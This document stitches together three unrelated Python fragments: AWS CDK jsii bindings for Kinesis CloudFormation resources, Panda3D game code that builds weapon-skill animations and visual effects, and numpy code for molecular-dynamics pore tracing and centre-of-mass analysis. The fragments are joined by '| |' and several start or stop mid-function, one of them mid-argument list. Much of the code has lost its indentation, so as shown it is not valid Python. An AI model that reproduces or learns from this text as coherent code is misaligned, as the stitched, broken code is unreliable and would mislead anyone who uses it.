            :param encryption_type: ``CfnStream.StreamEncryptionProperty.EncryptionType``.
            :param key_id: ``CfnStream.StreamEncryptionProperty.KeyId``.
            :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesis-stream-streamencryption.html
            '''
            # Values are stored in a dict; accessors below read from it and assert
            # the required keys are present.
            self._values: typing.Dict[str, typing.Any] = {
                "encryption_type": encryption_type,
                "key_id": key_id,
            }
        @builtins.property
        def encryption_type(self) -> builtins.str:
            '''``CfnStream.StreamEncryptionProperty.EncryptionType``.
            :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesis-stream-streamencryption.html#cfn-kinesis-stream-streamencryption-encryptiontype
            '''
            result = self._values.get("encryption_type")
            assert result is not None, "Required property 'encryption_type' is missing"
            return typing.cast(builtins.str, result)
        @builtins.property
        def key_id(self) -> builtins.str:
            '''``CfnStream.StreamEncryptionProperty.KeyId``.
            :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesis-stream-streamencryption.html#cfn-kinesis-stream-streamencryption-keyid
            '''
            result = self._values.get("key_id")
            assert result is not None, "Required property 'key_id' is missing"
            return typing.cast(builtins.str, result)
        def __eq__(self, rhs: typing.Any) -> builtins.bool:
            return isinstance(rhs, self.__class__) and rhs._values == self._values
        def __ne__(self, rhs: typing.Any) -> builtins.bool:
            return not (rhs == self)
        def __repr__(self) -> str:
            return "StreamEncryptionProperty(%s)" % ", ".join(
                k + "=" + repr(v) for k, v in self._values.items()
            )
@jsii.implements(aws_cdk.core.IInspectable)
class CfnStreamConsumer(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-kinesis.CfnStreamConsumer",
):
'''A CloudFormation ``AWS::Kinesis::StreamConsumer``.
:cloudformationResource: AWS::Kinesis::StreamConsumer
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-streamconsumer.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
consumer_name: builtins.str,
stream_arn: builtins.str,
) -> None:
'''Create a new ``AWS::Kinesis::StreamConsumer``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param consumer_name: ``AWS::Kinesis::StreamConsumer.ConsumerName``.
:param stream_arn: ``AWS::Kinesis::StreamConsumer.StreamARN``.
'''
props = CfnStreamConsumerProps(
consumer_name=consumer_name, stream_arn=stream_arn
)
jsii.create(CfnStreamConsumer, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
| |
seq = Sequence(Func(av.motionFSM.moveLock), Func(av.currentWeapon.hideMouse, av), Func(base.cr.targetMgr.setWantAimAssist, 1), Func(self.startChargeSound, av, skillId), Func(startVFX), av.actorInterval('wand_cast_start', blendOutT = 0), Func(av.loop, 'wand_cast_idle', blendT = 0))
del startVFX
return seq
def getCastHellfireAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
if isinstance(av.currentWeapon.effect, FlamingSkull):
av.currentWeapon.effect.wrtReparentTo(render)
(targetPos, speed, impactT) = av.getProjectileInfo(skillId, None)
av.currentWeapon.effect.playLaunch(speed, targetPos)
if av.currentWeapon.effect2:
av.currentWeapon.effect2.stopLoop()
av.currentWeapon.effect2 = None
seq = Sequence(Func(av.considerEnableMovement), Func(self.lockInput, av), Func(av.attackTire), Func(startVFX), Func(self.stopChargeSound, av), Func(self.playCastSound, av, skillId), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
del startVFX
return seq
def getChargeBanishAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
unlimited = av.isLocal()
offset = av.currentWeapon.getOffset(av.currentWeapon.itemId)
av.currentWeapon.effect = VoodooPower.getEffect(unlimited)
if av.currentWeapon.effect and not av.currentWeapon.isEmpty():
av.currentWeapon.effect.reparentTo(av.currentWeapon)
av.currentWeapon.effect.setPos(av.currentWeapon, offset + Vec3(0, 1.45, -0.10000000000000001))
av.currentWeapon.effect.setEffectColor(av.currentWeapon.getEffectColor(av.currentWeapon.itemId))
av.currentWeapon.effect.startLoop()
if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsMedium:
av.currentWeapon.effect2 = EnergySpiral.getEffect(unlimited)
if av.currentWeapon.effect2 and not av.currentWeapon.isEmpty():
av.currentWeapon.effect2.reparentTo(av.currentWeapon)
av.currentWeapon.effect2.setPos(av.currentWeapon, offset + Vec3(0, 0, -0.10000000000000001))
av.currentWeapon.effect2.setHpr(av.currentWeapon, 0.0, -90.0, 0.0)
av.currentWeapon.effect2.setEffectColor(av.currentWeapon.getEffectColor(av.currentWeapon.itemId))
av.currentWeapon.effect2.startLoop()
seq = Sequence(Func(av.motionFSM.moveLock), Func(av.currentWeapon.hideMouse, av), Func(base.cr.targetMgr.setWantAimAssist, 1), Func(self.startChargeSound, av, skillId), Func(startVFX), av.actorInterval('wand_cast_start', blendOutT = 0), Func(av.loop, 'wand_cast_idle', blendT = 0))
del startVFX
return seq
def getCastBanishAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
unlimited = av.isLocal()
if av.currentWeapon.effect:
av.currentWeapon.effect.stopLoop()
av.currentWeapon.effect = None
if av.currentWeapon.effect2:
av.currentWeapon.effect2.stopLoop()
av.currentWeapon.effect2 = None
if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsMedium:
effect = VoodooGlow.getEffect(unlimited)
if effect and not av.currentWeapon.isEmpty():
effect.reparentTo(av.currentWeapon)
effect.setPos(av.currentWeapon, av.currentWeapon.getOffset(av.currentWeapon.itemId))
effect.setEffectColor(av.currentWeapon.getEffectColor(av.currentWeapon.itemId))
effect.play()
seq = Sequence(Func(av.considerEnableMovement), Func(self.lockInput, av), Func(av.attackTire), Func(startVFX), Func(self.stopChargeSound, av), Func(self.playCastSound, av, skillId), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
del startVFX
return seq
    def getChargeDesolationAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
        """Build the charge-up interval for the Desolation staff skill.

        Locks movement and aim-assist, starts the charge sound, then (via a
        deferred Func) spawns the looping charge VFX and leaves the avatar in
        the cast-idle loop.  Returns None when no weapon is equipped.
        """
        if not av.currentWeapon:
            return None

        def startVFX():
            # Deferred: runs when the Sequence reaches Func(startVFX).
            unlimited = av.isLocal()
            if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsMedium:
                # Invisible motion-path actor; its 'spin' animation moves
                # 'joint1', which the smoke effect is parented to below —
                # presumably producing the spiralling smoke path.
                av.currentWeapon.effectActor = Actor.Actor('models/effects/mopath_none', {
                    'spin': 'models/effects/mopath_spiral' })
                joint = av.currentWeapon.effectActor.find('**/joint1')
                av.currentWeapon.effectActor.setScale(1.0, 0.75, 1.0)
                av.currentWeapon.effectActor.setP(0.0)
                av.currentWeapon.effectActor.reparentTo(av.currentWeapon)
                av.currentWeapon.effectActor.setPos(av.currentWeapon, 0.0, 1.7, 0.0)
                av.currentWeapon.effectActor.setPlayRate(1.5, 'spin')
                av.currentWeapon.effectActor.loop('spin')
                av.currentWeapon.effect = DesolationChargeSmoke.getEffect(unlimited)
                if av.currentWeapon.effect and not av.currentWeapon.isEmpty():
                    # NOTE(review): particleDummy goes on the weapon while the
                    # effect node rides the animated joint — TODO confirm this
                    # split parenting is intentional.
                    av.currentWeapon.effect.particleDummy.reparentTo(av.currentWeapon)
                    av.currentWeapon.effect.reparentTo(joint)
                    av.currentWeapon.effect.effectScale = 1.0
                    av.currentWeapon.effect.startLoop()
            if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsHigh:
                # Extra wind effect only at the high detail setting.
                av.currentWeapon.effect2 = WindCharge.getEffect(unlimited)
                if av.currentWeapon.effect2 and not av.currentWeapon.isEmpty():
                    av.currentWeapon.effect2.reparentTo(av.currentWeapon)
                    av.currentWeapon.effect2.setPos(av.currentWeapon, 0.0, 1.25, 0.0)
                    av.currentWeapon.effect2.setHpr(0, -90, 0)
                    av.currentWeapon.effect2.startLoop()
        seq = Sequence(Func(av.motionFSM.moveLock), Func(av.currentWeapon.hideMouse, av), Func(base.cr.targetMgr.setWantAimAssist, 1), Func(self.startChargeSound, av, skillId), Func(startVFX), av.actorInterval('wand_cast_start', blendOutT = 0), Func(av.loop, 'wand_cast_idle', blendT = 0))
        # The Sequence's Func holds its own reference to startVFX.
        del startVFX
        return seq
    def getCastDesolationAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
        """Build the cast (release) interval for the Desolation staff skill.

        Stops the looping charge-phase effects, then plays the area-of-effect
        burst visuals (sized from the skill's modified attack radius) plus a
        camera shake at the high detail setting.  Returns None when no weapon
        is equipped.
        """
        if not av.currentWeapon:
            return None

        def startVFX():
            # Deferred: runs when the Sequence reaches Func(startVFX).
            unlimited = av.isLocal()
            # Tear down the looping effects started during the charge phase.
            if av.currentWeapon.effect:
                av.currentWeapon.effect.stopLoop()
                av.currentWeapon.effect = None
            if av.currentWeapon.effect2:
                av.currentWeapon.effect2.stopLoop()
                av.currentWeapon.effect2 = None
            # One-shot effects parented to av.getParent() but positioned
            # relative to the avatar.
            effect = WindWave.getEffect(unlimited)
            if effect:
                effect.reparentTo(av.getParent())
                effect.setEffectColor(Vec4(1, 1, 1, 0.75))
                effect.setPos(av, 0.0, 0.0, 0.0)
                effect.setScale(1.0, 1.0, 1.0)
                effect.setHpr(0.0, 0.0, 0.0)
                effect.play()
            effect = SoulHarvest2.getEffect(unlimited)
            if effect:
                effect.reparentTo(av.getParent())
                effect.setPos(av, 0, 0, 2)
                # Radius tracks the skill's (modified) area-of-effect range.
                effect.radius = av.cr.battleMgr.getModifiedAttackAreaRadius(av, skillId, ammoSkillId)
                effect.play()
            if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsMedium:
                effect = DesolationSmoke.getEffect(unlimited)
                if effect:
                    effect.reparentTo(av.getParent())
                    effect.setEffectColor(Vec4(1, 1, 1, 1))
                    effect.setPos(av, 0.0, 0.0, 0.0)
                    effect.play()
                effect = DomeExplosion.getEffect(unlimited)
                if effect:
                    effect.reparentTo(av.getParent())
                    effect.setPos(av, 0, 0, 0)
                    effect.size = av.cr.battleMgr.getModifiedAttackAreaRadius(av, skillId, ammoSkillId)
                    effect.play()
                effect = DarkPortal.getEffect(unlimited)
                if effect:
                    effect.reparentTo(av.getParent())
                    effect.setPos(av, 0, 0, 0)
                    # Portal drawn at 3x the attack radius.
                    effect.size = av.cr.battleMgr.getModifiedAttackAreaRadius(av, skillId, ammoSkillId) * 3.0
                    effect.play()
            if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsHigh:
                cameraShakerEffect = CameraShaker()
                cameraShakerEffect.wrtReparentTo(av.getParent())
                cameraShakerEffect.setPos(av, 0.0, 0.0, 0.0)
                cameraShakerEffect.shakeSpeed = 0.074999999999999997
                cameraShakerEffect.shakePower = 1.0
                cameraShakerEffect.numShakes = 30
                cameraShakerEffect.scalePower = 1
                cameraShakerEffect.play(100.0)
        seq = Sequence(Func(av.considerEnableMovement), Func(self.lockInput, av), Func(av.attackTire), Func(startVFX), Func(self.stopChargeSound, av), Func(self.playCastSound, av, skillId), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
        # The Sequence's Func holds its own reference to startVFX.
        del startVFX
        return seq
def getFizzleAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
if av.currentWeapon.effect:
av.currentWeapon.effect.stopLoop()
av.currentWeapon.effect = None
if av.currentWeapon.effect2:
av.currentWeapon.effect2.stopLoop()
av.currentWeapon.effect2 = None
return Sequence(Func(av.considerEnableMovement), Func(base.cr.targetMgr.setWantAimAssist, 0), Func(self.lockInput, av), Func(self.stopChargeSound, av), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
def getCastFireAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
unlimited = av.isLocal()
self.cleanWeaponEffects(av)
motion_color = [
Vec4(1.0, 1.0, 1.0, 1.0),
Vec4(0.5, 0.20000000000000001, 1.0, 1.0)]
(targetPos, speed, impactT) = av.getProjectileInfo(skillId, target)
effect = VoodooProjectile.getEffect(unlimited)
if effect:
effect.reparentTo(render)
effect.setPos(av, 0, 2, 2)
effect.setH(av.getH(render))
effect.setEffectColor(av.currentWeapon.getEffectColor(av.currentWeapon.itemId))
effect.play(targetPos, speed, target)
if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsMedium:
effect = VoodooGlow.getEffect()
if effect and not av.currentWeapon.isEmpty():
effect.reparentTo(av.currentWeapon)
effect.setPos(av.currentWeapon, 0.0, 2.0, 0.0)
effect.setEffectColor(av.currentWeapon.getEffectColor(av.currentWeapon.itemId))
effect.play()
seq = Sequence(Func(base.cr.targetMgr.setWantAimAssist, 0), Func(self.lockInput, av), Func(av.attackTire), Func(startVFX), Func(self.playCastSound, av, skillId), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
del startVFX
return seq
def getToggleAuraOnAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
if not hasattr(av.currentWeapon, 'getStartWardingAura'):
return None
if skillId == EnemySkills.STAFF_TOGGLE_AURA_WARDING:
av.currentWeapon.getStartWardingAura(av).start()
elif skillId == EnemySkills.STAFF_TOGGLE_AURA_NATURE:
av.currentWeapon.getStartNatureAura(av).start()
elif skillId == EnemySkills.STAFF_TOGGLE_AURA_DARK:
av.currentWeapon.getStartDarkAura(av).start()
seq = Sequence(Func(base.cr.targetMgr.setWantAimAssist, 0), Func(self.lockInput, av), Func(startVFX), Func(self.startChargeSound, av, skillId), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
del startVFX
return seq
def getToggleAuraOffAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
seq = Sequence(Func(base.cr.targetMgr.setWantAimAssist, 0), Func(self.stopChargeSound, av), Func(self.lockInput, av), Func(self.unlockInput, av))
return seq
def cleanWeaponEffects(self, av):
if av.currentWeapon:
if av.currentWeapon.effect:
av.currentWeapon.effect.stopLoop()
av.currentWeapon.effect = None
if av.currentWeapon.effect2:
av.currentWeapon.effect2.stopLoop()
av.currentWeapon.effect2 = None
def getDrink(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.consumable:
return None
def hideCurrentWeapon():
if av.currentWeapon:
if not av.currentWeapon.isEmpty():
av.currentWeapon.hide()
def showCurrentWeapon():
if av.currentWeapon:
if not av.currentWeapon.isEmpty():
av.currentWeapon.show()
return Sequence(Func(self.lockInput, av), Func(av.attackTire), Func(self.lockDrink, av), Func(hideCurrentWeapon), Func(av.consumable.updateItemId, ammoSkillId), Func(av.consumable.attachTo, av), av.actorInterval('drink_potion', playRate = 1.5, startFrame = 8, endFrame = 45, blendInT = 0.20000000000000001, blendOutT = 0.20000000000000001), Func(showCurrentWeapon), Func(av.consumable.detachFrom, av), Func(self.unlockInput, av), Wait(0.59999999999999998), Func(self.unlockDrink, av))
def getChop(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), av.actorInterval('sword_cleave', playRate = 1.0, startFrame = 9, endFrame = 45, blendInT = 0.5, blendOutT = 0.5), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))
return ival
def getDoubleSlash(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), av.actorInterval('sword_slash', playRate = 1.5, blendInT = 0.5, blendOutT = 0.5), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))
return ival
def getLunge(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), Func(av.currentWeapon.playSkillSfx, skillId, av), av.actorInterval('sword_lunge', playRate = 1.5, blendInT = 0.5, blendOutT = 0.5), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))
return ival
def getStab(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), Func(av.currentWeapon.playSkillSfx, skillId, av), av.actorInterval('sword_thrust', playRate = 1.0, blendInT = 0.5, blendOutT = 0.5), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))
return ival
    def getRollThrust(self, av, skillId, ammoSkillId, charge, target, skillResult):
        """Build the rolling-thrust attack interval.

        Rolls the avatar toward the target (or straight ahead for the skill's
        attack range when there is no target) while playing the roll-thrust
        animation.  Returns None when no weapon is equipped.

        NOTE(review): roll state is kept on self (rollDistance/currAmount),
        so overlapping roll-thrusts from two avatars through the same handler
        instance would share state — presumably never happens in practice.
        """
        if not av.currentWeapon:
            return None
        # Temporary node used only to measure the heading toward the target.
        placeHolder = av.attachNewNode('rollThrustPlaceHolder')
        if target:
            placeHolder.lookAt(target)
            newH = av.getH() + placeHolder.getH()
            self.rollDistance = av.getDistance(target)
        else:
            newH = av.getH()
            self.rollDistance = WeaponGlobals.getAttackRange(skillId, ammoSkillId)
        # Stop half a unit short so we do not overshoot into the target.
        self.rollDistance = max(0.0, self.rollDistance - 0.5)
        self.currAmount = 0

        def setRollPosition(v):
            # Convert the lerp's absolute fraction v (0..1) into a per-tick
            # delta by tracking how far we have already moved.
            distance = self.rollDistance * v - self.currAmount
            self.currAmount += distance
            rotMat = Mat3.rotateMatNormaxis(av.getH(), Vec3.up())
            # Project the step along the ground plane using the lifter's
            # contact normal, then rotate into the avatar's heading.
            contact = av.physControls.lifter.getContactNormal()
            forward = contact.cross(Vec3.right())
            forward.normalize()
            vel = Vec3(forward * distance)
            vel = Vec3(rotMat.xform(vel))
            av.setFluidPos(Point3(av.getPos() + vel))
        # Local avatars get collision handling and the heading lerp; remote
        # avatars just play the animation (position comes over the wire).
        if av.isLocal():
            ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), Func(av.controlManager.currentControls.setCollisionsActive, 1), Parallel(av.actorInterval('sword_roll_thrust', playRate = 1.5, startFrame = 1, blendInT = 0, blendOutT = 0), LerpHprInterval(av, 0.050000000000000003, Vec3(newH, av.getP(), av.getR())), Sequence(Wait(0.29999999999999999), LerpFunctionInterval(setRollPosition, duration = 0.59999999999999998, fromData = 0.0, toData = 1.0, name = 'setRollPosition')), Sequence(Wait(0.59999999999999998), Func(av.controlManager.currentControls.setCollisionsActive, 0), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))))
        else:
            ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), Parallel(av.actorInterval('sword_roll_thrust', playRate = 1.5, startFrame = 1, blendInT = 0, blendOutT = 0), Sequence(Wait(0.59999999999999998), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))))
        placeHolder.removeNode()
        return ival
def getComboA(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), av.actorInterval('sword_comboA', playRate = 1.5, blendInT = 0.5, blendOutT = 0.5), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))
return ival
def getWildSlash(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Parallel(Sequence(Func(self.lockInput, av), Func(av.currentWeapon.endAttack, av), Func(av.currentWeapon.setTrailLength, 0.5), Func(av.currentWeapon.beginAttack, av), av.actorInterval('dagger_combo', playRate = 1.0, startFrame = 54, endFrame = 87, blendInT | |
# So ugly ... sadness :(
p2ps[0, i] = np.linalg.norm(p_centers[:, 0, i] - p_centers[:, 1, i])
p2ps[1, i] = np.linalg.norm(p_centers[:, 0, i] - p_centers[:, 2, i])
p2ps[2, i] = np.linalg.norm(p_centers[:, 0, i] - p_centers[:, 3, i])
p2ps[3, i] = np.linalg.norm(p_centers[:, 1, i] - p_centers[:, 2, i])
p2ps[4, i] = np.linalg.norm(p_centers[:, 1, i] - p_centers[:, 3, i])
p2ps[5, i] = np.linalg.norm(p_centers[:, 2, i] - p_centers[:, 3, i])
return p2ps
def limits(pos, pcenters):
    """
    Estimate the pore 'radius' based on the position of some component and its
    deviation from the pore center.  Beyond this radius we have entered the
    alkane region.

    :param pos: positions of all atoms included in making the estimate,
        shape [nT, natoms, 3]; atoms are assumed grouped sequentially by pore
    :param pcenters: the x,y positions of the pore centers for each frame,
        shape [nT, npores, 2]

    :return: approximate radius of each pore at each frame, shape [nT, npores]
    """
    nT = pcenters.shape[0]
    npores = pcenters.shape[1]
    natoms = pos.shape[1]
    atom_ppore = natoms // npores

    # Vectorized replacement of the previous triple Python loop (which also
    # allocated unused fr/frstd arrays and carried dead commented-out code):
    # group the flat atom axis into (pore, atom) and measure each atom's
    # xy-distance from its pore center by broadcasting.  Note: the per-frame
    # tqdm progress bar is no longer needed at this speed.
    xy = pos[:, :npores * atom_ppore, :2].reshape(nT, npores, atom_ppore, 2)
    deviation = np.linalg.norm(xy - pcenters[:, :, np.newaxis, :], axis=3)

    # Radius estimate: mean deviation of the atoms in each pore.
    return deviation.mean(axis=2)
def put_in_box(pt, x_box, y_box, m, angle):
    """
    Shift a coordinate back inside the (possibly sheared) periodic unit cell.
    The point is modified in place and also returned.

    :param pt: the point to place back in the box (numpy array, xy in pt[:2])
    :param x_box: length of box in x dimension
    :param y_box: length of box in y dimension
    :param m: slope of box vector
    :param angle: angle between x axis and y box vector
    :return: coordinate shifted into box
    """
    # y-intercept of the box edge that does not pass through the origin
    # (the right side of the box).
    right_intercept = -m * x_box
    # Displacement along the (tilted) y box vector.
    y_shift = np.array([np.cos(angle), np.sin(angle)]) * x_box
    if pt[1] < 0:               # point is below the box
        pt[:2] += y_shift
    if pt[1] > y_box:           # point is above the box
        pt[:2] -= y_shift
    if pt[1] > m * pt[0]:       # point is left of the box
        pt[0] += x_box
    if pt[1] < m * pt[0] + right_intercept:  # point is right of the box
        pt[0] -= x_box
    return pt
def trace_pores(pos, box, npoints, npores=4, progress=True, save=True, savename='spline.pl'):
    """
    Find the line which traces through the center of the pores

    :param pos: positions of atoms used to define pore location (args.ref) [natoms, 3]
    :param box: xy box vectors, [2, 2], mdtraj format (t.unitcell_vectors)
    :param npoints: number of points for spline in each pore
    :param npores: number of pores in unit cell (assumed that atoms are numbered sequentially by pore. i.e. pore 1 atom
    numbers all precede those in pore 2)
    :param progress: set to True if you want a progress bar to be shown
    :param save: save spline as pickled object
    :param savename: path to spline. If absolute path is not provided, will look in current directory

    :type pos: np.ndarray
    :type box: np.ndarray
    :type npoints: int
    :type npores: int
    :type progress: bool
    :type save: bool
    :type savename: str

    :return: points which trace the pore center
    """
    # Fast path: reuse a previously pickled spline if one exists on disk.
    try:
        print('Attempting to load spline ... ', end='', flush=True)
        spline = file_rw.load_object(savename)
        print('Success!')
        return spline[0], spline[1]
    except FileNotFoundError:
        print('%s not found ... Calculating spline' % savename)
    single_frame = False
    # np.shape(pos.shape)[0] is just pos.ndim: promote a single frame to a
    # 1-frame trajectory so the loops below work uniformly.
    if np.shape(pos.shape)[0] == 2:
        pos = pos[np.newaxis, ...]  # add a new axis if we are looking at a single frame
        box = box[np.newaxis, ...]
        single_frame = True
    nframes = pos.shape[0]
    atoms_p_pore = int(pos.shape[1] / npores)  # atoms in each pore
    v = np.zeros([nframes, 4, 2])  # vertices of unitcell box
    bounds = []
    # Vertices of the (possibly sheared) xy unit cell per frame.
    v[:, 0, :] = [0, 0]
    v[:, 1, 0] = box[:, 0, 0]
    v[:, 3, :] = np.vstack((box[:, 1, 0], box[:, 1, 1])).T
    v[:, 2, :] = v[:, 3, :] + np.vstack((box[:, 0, 0], np.zeros([nframes]))).T
    center = np.vstack((np.mean(v[..., 0], axis=1), np.mean(v[..., 1], axis=1), np.zeros(nframes))).T
    for t in range(nframes):
        bounds.append(mplPath.Path(v[t, ...]))  # create a path tracing the vertices, v
    angle = np.arcsin(box[:, 1, 1]/box[:, 0, 0])  # specific to case where magnitude of x and y box lengths are equal
    angle = np.where(box[:, 1, 0] < 0, angle + np.pi / 2, angle)  # haven't tested this well yet
    m = (v[:, 3, 1] - v[:, 0, 1]) / (v[:, 3, 0] - v[:, 0, 0])  # slope from points connecting first and third vertices
    centers = np.zeros([nframes, npores, npoints, 3])
    bin_centers = np.zeros([nframes, npores, npoints])
    for t in tqdm.tqdm(range(nframes), disable=(not progress)):
        for p in range(npores):
            pore = pos[t, p*atoms_p_pore:(p+1)*atoms_p_pore, :]  # coordinates for atoms belonging to a single pore
            # Wrap z back into the box repeatedly; cross-linked configurations
            # can extend very far up and down.
            while np.min(pore[:, 2]) < 0 or np.max(pore[:, 2]) > box[t, 2, 2]:
                pore[:, 2] = np.where(pore[:, 2] < 0, pore[:, 2] + box[t, 2, 2], pore[:, 2])
                pore[:, 2] = np.where(pore[:, 2] > box[t, 2, 2], pore[:, 2] - box[t, 2, 2], pore[:, 2])
            _, bins = np.histogram(pore[:, 2], bins=npoints)  # bin z-positions
            section_indices = np.digitize(pore[:, 2], bins)  # list that tells which bin each atom belongs to
            bin_centers[t, p, :] = [(bins[i] + bins[i + 1])/2 for i in range(npoints)]
            for l in range(1, npoints + 1):
                atom_indices = np.where(section_indices == l)[0]
                # NOTE(review): an empty z-bin would raise IndexError here —
                # presumably atoms are dense enough that bins never empty.
                before = pore[atom_indices[0], :]  # choose the first atom as a reference
                shift = transform.translate(pore[atom_indices, :], before, center[t, :])  # shift everything towards the center
                for i in range(shift.shape[0]):  # check if the points are within the bounds of the unitcell
                    while not bounds[t].contains_point(shift[i, :2]):
                        shift[i, :] = put_in_box(shift[i, :], box[t, 0, 0], box[t, 1, 1], m[t], angle[t])  # if it's not in the unitcell, shift it so it is
                c = [np.mean(shift, axis=0)]
                centers[t, p, l - 1, :] = transform.translate(c, center[t, :], before)  # move everything back to where it was
                # NOTE(review): contains_point is handed the full 3-component
                # point here (vs. [:2] above) — TODO confirm intended.
                while not bounds[t].contains_point(centers[t, p, l - 1, :]):  # make sure everything is in the box again
                    centers[t, p, l - 1, :] = put_in_box(centers[t, p, l - 1, :], box[t, 0, 0], box[t, 1, 1], m[t], angle[t])
    if single_frame:
        return centers[0, ...]  # doesn't return bin center yet
    else:
        if save:
            file_rw.save_object((centers, bin_centers), savename)
        return centers, bin_centers
def center_of_mass(pos, mass_atoms):
    """ Calculate center of mass of residues over a trajectory

    :param pos: xyz coordinates of atoms; residues are assumed to occupy
        consecutive runs of len(mass_atoms) atoms
    :param mass_atoms: mass of atoms in order they appear in pos

    :type pos: np.array (nframes, natoms, 3)
    :type mass_atoms: list

    :return: center of mass of each residue at each frame,
        shape (nframes, nresidues, 3)
    """
    masses = np.asarray(mass_atoms, dtype=float)
    natoms = masses.size  # atoms per residue
    nframes = pos.shape[0]
    nres = pos.shape[1] // natoms
    # Hoisted out of the loop: the original recomputed sum(mass_atoms) for
    # every residue at every frame.
    total_mass = masses.sum()

    # Vectorized: group the flat atom axis into (residue, atom) and take the
    # mass-weighted mean over each residue's atoms.
    grouped = pos[:, :nres * natoms, :].reshape(nframes, nres, natoms, 3)
    com = (grouped * masses[np.newaxis, np.newaxis, :, np.newaxis]).sum(axis=2) / total_mass
    return com
def residue_center_of_mass(t, res):
    """ Calculate the center of mass versus time of a residue in an MD trajectory

    :param t: mdtraj trajectory object
    :param res: name of residue to track

    :type t: object
    :type res: str

    :return: center of mass of residue versus time
    """
    residue = topology.Residue(res)  # get residue attributes (project-local topology helper)
    ndx = [a.index for a in t.topology.atoms if a.residue.name == res]  # index of all residue atoms
    # Atom names within one residue; assumes every copy of the residue lists
    # its atoms in the same order.
    names = [a.name for a in t.topology.atoms if a.residue.name == res][:residue.natoms]
    mass = [residue.mass[x] for x in names]  # mass of atoms in order that they appear in file
    print('Calculating center of mass trajectories of residue %s' % residue.name)
